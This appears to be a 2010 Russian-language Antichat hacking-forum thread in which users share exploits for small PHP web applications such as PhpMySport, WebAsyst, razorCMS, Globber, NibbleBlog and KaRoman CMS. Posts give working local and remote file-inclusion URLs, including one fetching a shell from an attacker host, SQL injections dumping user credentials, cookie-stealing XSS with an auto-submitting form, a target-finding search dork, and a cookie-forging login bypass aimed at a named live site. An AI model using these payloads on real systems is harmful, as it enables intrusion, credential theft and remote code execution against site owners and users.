Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.05.2010, 22:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
PhpMySport
PhpMySport
Site: phpmysport.sourceforge.net
Vulnerability: Local Files Include
Severity: High
Needs: magic_quotes=Off (or null-byte alternative)
Exploit: /index.php?lg=/../../../../../../../../../etc/passwd%00
Reason: В index.php есть строчки:
PHP код:
...
/************************/
/* LANGUAGE MANAGEMENT */
/************************/
if(!@include_once(create_path("include/lg_general_".LANG.".php")))
{
echo "ERREUR : Language not supported/Langue non supportИe";
exit();
}
...
Константа LANG определяется в config.php и изначально берётся из get-параметра lg. Таким образом, мы можем написать слеш /, тем самым закрыв директорию, затем подняться вверх, расширение отрезать нулл-байтом.
Если не удаётся заинклудить, вылезает ошибка "ERREUR : Language not supported/Langue non supportИe". Вывод php-ошибок отключён.
Example: На официальном сайте http://phpmysport.sourceforge.net/demo/index.php?lg=/../../../../../../../../../etc/passwd%00&skin=defaut
Последний раз редактировалось shell_c0de; 12.05.2010 в 22:10..
|
|
|

16.05.2010, 14:02
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Strawberry 1.1.1 (Он же когда-то CuteNews)
Пассивная XSS:
/example/index.php?do=abcd{abcd}body{background-image:%20url(javascript:alert());}
Arctic Fox CMS v0.9.4
SQL Inj
/index.php?page=abcd%22+union+select+1,2+--+
Последний раз редактировалось Ctacok; 15.06.2010 в 08:03..
|
|
|

26.05.2010, 19:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
WebAsyst
Dork: - inurl:index.php?ukey=news&blog_id=
Exploit: - http://site.com/index.php?ukey=news&blog_id=(select+1+from+(select +count(0),concat((select+version()),floor(rand(0)* 2))+from+SC_news_table+group+by+2+limit+1)a)--+
4.1<=MySql=>5
|
|
|

27.05.2010, 20:43
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
Программа: razorCMS 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "content" сценарием admin/index.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
Код:
<form action="http://example.com/admin/?action=edit&slab=home" method="post" name="main" >
<input type="hidden" name="title" value="Home" />
<input name="content" type="hidden" value='hello"><script>alert("2"+document.cookie)</script>' />
<input type="hidden" name="ptitle" value="" />
<input type="hidden" name="theme" value="theme-default" />
<input type="hidden" name="check_sidebar" value="sidebar" />
<input type="hidden" name="save" value="Save Content" />
</form>
<script>
document.main.submit();
</script>
|
|
|
Globber 1.4 PHP Code Execution |

31.05.2010, 16:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
Globber 1.4 PHP Code Execution
Globber 1.4
Site: https://launchpad.net/globber
PHP Code Execution
Vuln file: /include/admin/edit.inc.php
PHP код:
if(!$_EXEC){ die; }
if($_POST){
foreach($_POST as $key => $val){
$f .= '['.$key.']'.stripslashes($val).'[/'.$key.']'."\n";
}
if($_GET['c']==''){
$_GET['c'] = 'misc';
}
if(!is_dir('blog/'.$_GET['c'])){
mkdir('blog/'.$_GET['c']);
}
file_put_contents('blog/'.$_GET['c'].'/'.$_GET['a'], $f);
/*...*/
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/include/admin/edit.inc.php?c=../../admin&a=rebuild.inc.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
_EXEC=<?php phpinfo();?>
В результате файл rebuild.inc.php перезапишется, и будет иметь содержимое:
Код:
[_EXEC]<?php phpinfo();?>[/_EXEC]
По адресу http:// [host]/ [path]/include/admin/rebuild.inc.php, любуемся phpinfo
__________________
Avant que l'ombre...
|
|
|

02.06.2010, 01:11
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме: 736224
Репутация:
388
|
|
LiveStreet 2
XSS активная:
в поле, для комментария, к просьбе добавить в друзья, вставляем:
Код:
"><script>alert();</script>
.
При просмотре сообщения пользователем, код выполнится.
====================================
XSS активная:
добавляем новую запись, и в поле для меток, вставляем:
Код:
"><script>alert();</script>
.
Когда другой пользователь, будет выбирать метки для своего сообщения, код выполнится
Последний раз редактировалось Bb0y; 04.06.2010 в 01:04..
|
|
|
NibbleBlog 2.0 Remote File Inclusion |

03.06.2010, 13:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
NibbleBlog 2.0 Remote File Inclusion
NibbleBlog 2.0
Site: http://www.nibbleblog.com
Remote File Inclusion
Vuln file: /admin/includes/index_login.php
PHP код:
if($var_url['exe']=='login')
{
$var_form['login_user'] = (string) $_POST['form_field_user'];
$var_form['login_password'] = (string) $_POST['form_field_password'];
if( !empty($var_form['login_user']) && !empty($var_form['login_password']) )
{
include($_PATH['shadow.php']);
/*...*/
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
|
|
|

07.06.2010, 23:25
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме: 1224548
Репутация:
134
|
|
E2 SELECTA
Site: http://blogengine.ru/
Local File Include(0-day ):
./spesta/counter.php
Уязвимый код:
PHP код:
...
if (!isset ($s_addurl))
{
$z=dirname(__FILE__);
$z2=$_SERVER['DOCUMENT_ROOT'].dirname ($_SERVER['PHP_SELF']);
$s_addurl=substr ($z, strpos ($z, $z2)+strlen($z2));
if ($s_addurl!="") $s_addurl.="/";
}
else [COLOR=DarkRed]$s_addurl=str_replace (":","", $s_addurl);[/COLOR]
include ($s_addurl."func.php");
...
Exploit:
Как видно из нашей переменной вырезается двоеточие, поэтому теоретически имеем только локальный инклуд, однако нам на руку то, что движок ведёт своеобразный журнал по адресу ./spesta/data/, в частности в файл requests.php записывается запрошенный URL, и ничто не мешает указать в нём например <?php phpinfo();?>, поэтому сначала обращаемся к какой-нибудь страницe добавив к URL-адресу наш php-код, а затем инклудим вот так:
Код:
./spesta/counter.php?s_addurl=data/request.txt%00
Также можно внести код в agents.txt(логируются юзерагенты).
Примечание:
для этой уязвимости не играет роли значение register_globals, так как в .htacess эта настройка взводится, однако на всякий случай я решил уведомить об этом.
Содержимое .htacess:
Код:
RewriteEngine Off
DirectoryIndex index.php
Options -Indexes -MultiViews
ErrorDocument 403 /stat/deny.php
<IfModule mod_php4.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
<IfModule mod_php5.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
Последний раз редактировалось _iks_; 13.06.2010 в 11:27..
|
|
|

09.06.2010, 23:44
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме: 1224548
Репутация:
134
|
|
KaRoman CMS
http://sourceforge.net/projects/karoman/
SQL-инъекция(mq == off): ./view_article.php?id=0'+union+select+1,concat(user, 0x3a,pass),3,4,5,6,7,8+FROM+userlist--+
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT * FROM articles WHERE id='$id'",$db); // Выбираем нужные таблицы
...
SQL-иньекция(права администратора): ./admin/settings.php?id=100500+union+select+1,2,3,4,5,6
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT title,id FROM settings");
...
SQL-иньекция(права администратора): ./admin/edit_art.php?id=100500+union+select+1,2,3,4,5,6,7, 8
PHP код:
...
if (isset($_GET['id'])) {$id = $_GET['id'];}
$result = mysql_query("SELECT * FROM articles WHERE id=$id");
...
|
|
|

14.06.2010, 12:12
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме: 3300342
Репутация:
165
|
|
Ov3rLo1d[-]Invisible
http://wowjp.net/forum/61-15808-1
/admin/index.php
PHP код:
...
if (!isset($HTTP_POST_VARS["submitloginform"]) && (($HTTP_COOKIE_VARS['userlogged'] == "yes") || ($_SESSION['sessionlogin'] == "yes"))) {
/* Sets $PHPSESSID to the PHPSESSID in the cookie */
$PHPSESSID = $HTTP_COOKIE_VARS['userid'];
/* Set $mode to the thingy on the url */
$mode = $HTTP_GET_VARS['mode'];
/* Removes the cookie before anything is displayed */
if ($mode == "logout") {
session_destroy();
setcookie("userlogged", "", time()-600);
setcookie("userid", "", time()-600);
}
...
Добавляем себе в куки userlogged = yes
Код:
http://shadow-server.ru/admin/
Последний раз редактировалось SeNaP; 14.06.2010 в 22:42..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|